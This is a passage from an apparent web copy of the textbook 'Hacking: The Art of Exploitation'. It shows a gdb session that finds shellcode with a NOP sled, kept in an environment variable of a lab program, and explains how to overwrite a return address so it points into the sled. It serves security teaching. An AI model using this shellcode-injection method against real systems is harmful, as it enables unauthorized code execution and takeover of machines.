EXPLOITATION - Hacking: The Art of Exploitation

Graphics Programs Reference

In-Depth Information

A breakpoint is set at the beginning of main() , and the program is run.

This will set up memory for the program, but it will stop before anything

happens. Now we can examine memory down near the bottom of the stack.

(gdb) i r esp

esp 0xbffff660 0xbffff660

(gdb) x/24s $esp + 0x240

0xbffff8a0: ""

0xbffff8a1: ""

0xbffff8a2: ""

0xbffff8a3: ""

0xbffff8a4: ""

0xbffff8a5: ""

0xbffff8a6: ""

0xbffff8a7: ""

0xbffff8a8: ""

0xbffff8a9: ""

0xbffff8aa: ""

0xbffff8ab: "i686"

0xbffff8b0: "/home/reader/booksrc/notesearch"

0xbffff8d0: "SSH_AGENT_PID=7531"

0xbffffd56: "SHELLCODE=", '\220' <repeats 190 times>...

0xbffff9ab: "\220\220\220\220\220\220\220\220\220\2201ï¿½1ï¿½1ï¿½\231ï¿½ï¿½ï¿½\200j\vXQh//

shh/bin\211ï¿½Q\211ï¿½S\211ï¿½ï¿½\200"

0xbffff9d9: "TERM=xterm"

0xbffff9e4: "DESKTOP_STARTUP_ID="

0xbffff9f8: "SHELL=/bin/bash"

0xbffffa08: "GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2"

0xbffffa43: "WINDOWID=39845969"

0xbffffa55: "USER=reader"

0xbffffa61:

"LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=

40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01

;31:*.taz=0"...

0xbffffb29:

"1;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;3

1:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01

;35:*.tga=0"...

(gdb) x/s 0xbffff8e3

0xbffff8e3: "SHELLCODE=", '\220' <repeats 190 times>...

(gdb) x/s 0xbffff8e3 + 100

0xbffff947: '\220' <repeats 110 times>, "1ï¿½1ï¿½1ï¿½\231ï¿½ï¿½ï¿½\200j\vXQh//shh/bin\

211ï¿½Q\211ï¿½S\211ï¿½ï¿½\200"

(gdb)

The debugger reveals the location of the shellcode, shown in bold above.

(When the program is run outside of the debugger, these addresses might

be a little different.) The debugger also has some information on the stack,

which shifts the addresses around a bit. But with a 200-byte NOP sled, these

inconsistencies aren't a problem if an address near the middle of the sled is

picked. In the output above, the address 0xbffff947 is shown to be close to the

middle of the NOP sled, which should give us enough wiggle room. After

determining the address of the injected shellcode instructions, the exploita-

tion is simply a matter of overwriting the return address with this address.

Hacking: The Art of Exploitation

Search WWH ::

Custom Search

Home